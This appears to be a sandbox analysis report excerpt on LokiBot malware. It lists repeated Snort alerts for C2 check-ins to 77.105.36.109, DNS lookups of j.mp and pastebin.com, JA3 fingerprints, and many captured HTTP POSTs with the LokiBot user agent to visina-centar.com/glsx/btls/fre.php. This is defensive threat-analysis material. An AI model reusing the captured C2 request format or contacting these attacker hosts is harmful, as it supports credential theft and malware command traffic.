            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49227 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49227 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49227 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49227 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49228 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49228 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49228 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49228 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49229 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49229 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49229 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49229 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49230 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49230 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49230 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49230 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49231 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49231 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49231 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49231 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49232 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49232 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49232 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49232 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49233 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49233 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49233 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49233 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49234 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49234 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49234 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49234 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49235 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49235 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49235 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49235 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49236 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49236 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49236 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49236 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49237 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49237 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49237 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49237 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49238 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49238 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49238 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49238 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49239 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49239 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49239 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49239 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49240 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49240 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49240 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49240 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49241 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49241 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49241 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49241 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49242 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49242 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49242 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49242 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49243 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49243 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49243 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49243 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49244 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49244 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49244 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49244 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49245 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49245 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49245 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49245 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49246 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49246 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49246 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49246 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49247 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49247 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49247 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49247 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49248 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49248 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49248 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49248 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49249 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49249 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49249 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49249 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49250 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49250 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49250 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49250 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49251 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49251 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49251 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49251 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49252 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49252 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49252 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49252 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49253 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49253 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49253 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49253 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49254 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49254 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49254 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49254 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49255 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49255 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49255 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49255 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49256 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49256 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49256 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49256 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49257 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49257 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49257 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49257 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49259 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49259 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49259 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49259 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49260 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49260 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49260 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49260 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49261 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49261 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49261 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49261 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49262 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49262 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49262 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49262 -> 77.105.36.109:80
            Connects to a URL shortener service
            Source: unknown; DNS query: name: j.mp
            Connects to a pastebin service (likely for C&C)
            Source: unknown; DNS query: name: pastebin.com
            Source: Joe Sandbox View; Domain Name: j.mp
            Source: Joe Sandbox View; IP Address: 104.23.99.190
            Source: Joe Sandbox View; IP Address: 67.199.248.17
            Source: Joe Sandbox View; IP Address: 104.23.98.190
            Source: Joe Sandbox View; ASN Name: unknown
            Source: Joe Sandbox View; JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
            Source: Joe Sandbox View; JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
            Source: Joe Sandbox View; JA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
            Source: global traffic; HTTP traffic detected:
              POST /glsx/btls/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: visina-centar.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 98B70CC2
              Content-Length: 174
              Connection: close
            Source: global traffic; HTTP traffic detected:
              POST /glsx/btls/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: visina-centar.com
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 98B70CC2
              Content-Length: 147
              Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
            Source: global trafficHTTP traffic detected: POST /glsx/btls/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: visina-centar.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 98B70CC2Content-Length: 147Connection: close
